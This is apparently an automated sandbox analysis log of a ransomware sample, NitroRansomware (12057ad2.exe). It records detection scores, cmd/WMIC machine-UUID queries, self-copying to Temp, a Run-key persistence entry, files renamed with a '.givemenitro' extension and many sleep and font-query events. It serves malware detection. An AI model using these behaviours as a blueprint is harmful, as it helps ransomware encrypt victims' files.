            Source: 12057ad2.exe, 00000000.00000000.303857775.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hl,\\StringFileInfo\\000004B0\\OriginalFilename vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.572263031.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 12057ad2.exe
            Source: 12057ad2.exeBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe.0.drBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exeReversingLabs: Detection: 92%
            Source: 12057ad2.exeVirustotal: Detection: 61%
            Source: 12057ad2.exeMetadefender: Detection: 54%
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Users\user\Desktop\12057ad2.exeJump to behavior
            Source: 12057ad2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\12057ad2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\12057ad2.exe "C:\Users\user\Desktop\12057ad2.exe"
            Source: C:\Users\user\Desktop\12057ad2.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12057ad2.exe "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12057ad2.exe "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
            Source: C:\Users\user\Desktop\12057ad2.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Users\user\Desktop\12057ad2.exe | File created: C:\Users\user\Documents\AQRFEVRTGL.jpg.givemenitro
            Source: C:\Users\user\Desktop\12057ad2.exe | File created: C:\Users\user\AppData\Local\Temp\12057ad2.exe
            Source: classification engine | Classification label: mal100.rans.troj.winEXE@8/56@7/4
            Source: C:\Users\user\Desktop\12057ad2.exe | File read: C:\Users\user\Pictures\desktop.ini
            Source: 12057ad2.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\12057ad2.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1604:120:WilError_01
            Source: 12057ad2.exe, Crypto.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 12057ad2.exe.0.dr, Crypto.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.0.12057ad2.exe.c60000.0.unpack, Crypto.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\12057ad2.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: 12057ad2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 12057ad2.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 12057ad2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\asbib\Desktop\Nitro-Ransomware-master\NitroRansomware\obj\Debug\NitroRansomware.pdb | source: 12057ad2.exe, 12057ad2.exe.0.dr
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06ACF6E0 pushad ; iretd | 4_2_06ACF6E1
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06ACEE18 pushad ; retf | 4_2_06ACEE19
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06ACEE1A push esp; retf | 4_2_06ACEE21
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06AC61F8 push 3804B163h; iretd | 4_2_06AC61FD
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06CE9651 push eax; mov dword ptr [esp], edx | 4_2_06CE9664
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 4_2_06CE5830 push es; ret | 4_2_06CE58B0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 5_2_06B261F8 push 38052263h; iretd | 5_2_06B261FD
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Code function: 5_2_08089EBA push eax; mov dword ptr [esp], edx | 5_2_08089ECC
            Source: 12057ad2.exe | Static PE information: 0xEB227BDA [Mon Jan 3 15:08:10 2095 UTC]
            Source: C:\Users\user\Desktop\12057ad2.exe | File created: C:\Users\user\AppData\Local\Temp\12057ad2.exe
            Source: C:\Users\user\Desktop\12057ad2.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NR
            Source: C:\Users\user\Desktop\12057ad2.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 6112 | Thread sleep count: 9674 > 30
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -200000s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99858s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99731s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99624s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99500s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99390s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99265s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99136s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99031s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -98884s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -98753s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -98609s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99890s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99781s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99670s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99921s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99812s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99702s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99937s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99827s >= -30000s
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280 | Thread sleep time: -99694s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 4212 | Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 5336 | Thread sleep count: 286 > 30
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 6052 | Thread sleep time: -25825441703193356s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 3540 | Thread sleep count: 9528 > 30
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\12057ad2.exe | Window / User API: threadDelayed 9674
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Window / User API: threadDelayed 9546
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Window / User API: threadDelayed 9528
            Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\12057ad2.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 100000
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99858
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99731
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99624
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99500
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99390
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99265
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99136
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99031
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 98884
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 98753
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 98609
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99890
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99781
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99670
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99921
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99812
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99702
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99937
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99827
            Source: C:\Users\user\Desktop\12057ad2.exe | Thread delayed: delay time: 99694
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Thread delayed: delay time: 922337203685477
            Source: 12057ad2.exe, 00000000.00000002.573733788.00000000014A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: C:\Users\user\Desktop\12057ad2.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\12057ad2.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\12057ad2.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\12057ad2.exe | Queries volume information: C:\Users\user\Desktop\12057ad2.exe VolumeInformation
            Source: C:\Users\user\Desktop\12057ad2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\12057ad2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\12057ad2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
